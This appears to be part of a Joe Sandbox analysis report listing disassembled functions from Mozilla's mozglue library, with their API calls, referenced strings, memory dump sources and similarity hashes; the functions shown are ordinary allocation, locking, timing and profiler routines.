                                                                                                                                                                                                                                                                                        Function 6C977FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C978007
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C97801D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C97802B
                                                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C97803D
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C97808D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: mozalloc_abort.MOZGLUE(?), ref: 6C97CAA2
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C97809B
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C9780B9
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9780DF
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9780ED
                                                                                                                                                                                                                                                                                        • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9780FB
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C97810D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C978133
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C978149
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C978167
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C97817C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C978199
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2721933968-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d7652ef5e0b983d38e575d6bc149e8cde9c7e52c0f2b93d5dc3daa544d2c15a5
                                                                                                                                                                                                                                                                                        • Instruction ID: 3f8d096ea9da36fee25b497ea759c1ef8f970cf849d7a8d3b2d2d6107c961841
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7652ef5e0b983d38e575d6bc149e8cde9c7e52c0f2b93d5dc3daa544d2c15a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C5193B2E01204ABDF10DBA5DC849EFB7B9AF69224F240525E815F7741E730E904CBB5
                                                                                                                                                                                                                                                                                        Function 6C9C6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C9EF618), ref: 6C9C6694
                                                                                                                                                                                                                                                                                        • GetThreadId.KERNEL32(?), ref: 6C9C66B1
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9C66B9
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C9C66E1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF618), ref: 6C9C6734
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C9C673A
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF618), ref: 6C9C676C
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C9C67FC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C9C6868
                                                                                                                                                                                                                                                                                        • RtlCaptureContext.NTDLL ref: 6C9C687F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                        • String ID: WalkStack64
                                                                                                                                                                                                                                                                                        • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                                                        • Opcode ID: 13d0fe0773d5af7dcad45940b900da003e499c42668cb37f964e292d64b003e9
                                                                                                                                                                                                                                                                                        • Instruction ID: 9f7277f9b6d2efab59e9e0cb485affda18df69dc592b538b5569a5db08b6fcd5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13d0fe0773d5af7dcad45940b900da003e499c42668cb37f964e292d64b003e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88518A71A09341AFDB11CF24C884A6ABBF8BF9DB14F10492DF99997640D770E918CB93
                                                                                                                                                                                                                                                                                        Function 6C9ADE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9ADE73
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9ADF7D
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9ADF8A
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9ADFC9
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9ADFF7
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AE000
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C974A68), ref: 6C9ADE7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C974A68), ref: 6C9ADEB8
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,6C974A68), ref: 6C9ADEFE
                                                                                                                                                                                                                                                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9ADF38
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • <none>, xrefs: 6C9ADFD7
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C9AE00E
                                                                                                                                                                                                                                                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C9ADE83
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                                                                                        • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                                                        • API String ID: 1281939033-809102171
                                                                                                                                                                                                                                                                                        • Opcode ID: 93237df78516550db2a5654f682119f1889c8aee35ca0d655dd967e0bbcd39bd
                                                                                                                                                                                                                                                                                        • Instruction ID: b2e432233aa7ff7654ecfa02c4ded3722ea480bd4f3e2549dcfa46f29682cee3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93237df78516550db2a5654f682119f1889c8aee35ca0d655dd967e0bbcd39bd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9341D5767052119BDB109BA4E8087AA7779FFBD30CF24001AED0997B41DB32D916CBE6
                                                                                                                                                                                                                                                                                        Function 6C9BD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9BD4F0
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9BD4FC
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9BD52A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9BD530
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9BD53F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9BD55F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9BD585
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9BD5D3
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9BD5F9
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9BD605
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9BD652
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9BD658
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9BD667
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9BD6A2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8fb249824e4b1d4000872a42ce00c5d07e8dd008cf88d398f413ca673ff964e5
                                                                                                                                                                                                                                                                                        • Instruction ID: c3521bf70c0c94e7546c3f9452d5556b8e5111a4fabb0f5b5d80f5f72a0a40b2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fb249824e4b1d4000872a42ce00c5d07e8dd008cf88d398f413ca673ff964e5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F517CB1608705EFC744CF24C884A9ABBB4FF99318F108A2EE95A97710DB30E945CB95
                                                                                                                                                                                                                                                                                        Function 6C985670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C9856D1
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9856E9
                                                                                                                                                                                                                                                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C9856F1
                                                                                                                                                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C985744
                                                                                                                                                                                                                                                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C9857BC
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C9858CB
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C9858F3
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C985945
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C9859B2
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C9EF638,?,?,?,?), ref: 6C9859E9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                        • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                        • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                        • Opcode ID: 899c853e5123a08aebf0c67880c3180985302c8ee46f2ef989894c4a8376781c
                                                                                                                                                                                                                                                                                        • Instruction ID: 449a1b0476c262edf3ca089555b98177e46039515e7b13ac1a5f797acb962291
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 899c853e5123a08aebf0c67880c3180985302c8ee46f2ef989894c4a8376781c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8C17D31A0D7449FDB05CF28C44066ABBF1BFEA718F158A1EE4C597660D731E989CB82
                                                                                                                                                                                                                                                                                        Function 6C9AEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEC84
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AEC8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AECA1
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AECAE
                                                                                                                                                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C9AECC5
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AED0A
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9AED19
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C9AED28
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9AED2F
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AED59
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C9AEC94
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                        • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                        • Opcode ID: ad865863c9eda9a940bec9c7d8e5785f3eab991f7228970c1da69dfa7c3c9797
                                                                                                                                                                                                                                                                                        • Instruction ID: 5e2f8ba139f362027db7b16d5f1632f917833f1c0c1bca37fb7e0fd52d427734
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad865863c9eda9a940bec9c7d8e5785f3eab991f7228970c1da69dfa7c3c9797
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB21FC75504204AFDB419FA4D808B9A3779FFB936CF204215FD1857741E731D8268BE5
                                                                                                                                                                                                                                                                                        Function 6C9A8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C96EB83
                                                                                                                                                                                                                                                                                        • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C9AB392,?,?,00000001), ref: 6C9A91F4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                                                                                        • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                                                                                        • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                                                                                        • Opcode ID: 3587db270f334bd0c9122e8662dc41922eadee169e25f3322c6553d6f581a181
                                                                                                                                                                                                                                                                                        • Instruction ID: 1330020ea90a97ffd45ac92c3004f77723f81017e84c7f2b361751c87759220c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3587db270f334bd0c9122e8662dc41922eadee169e25f3322c6553d6f581a181
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B1D6B1A016099BDB04CFA5C8557EEBBB5FFA9308F214019D502ABF80D731E956CBE1
                                                                                                                                                                                                                                                                                        Function 6C98C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C98C5A3
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C98C9EA
                                                                                                                                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C98C9FB
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C98CA12
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C98CA2E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C98CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                                                        • String ID: (null)$0
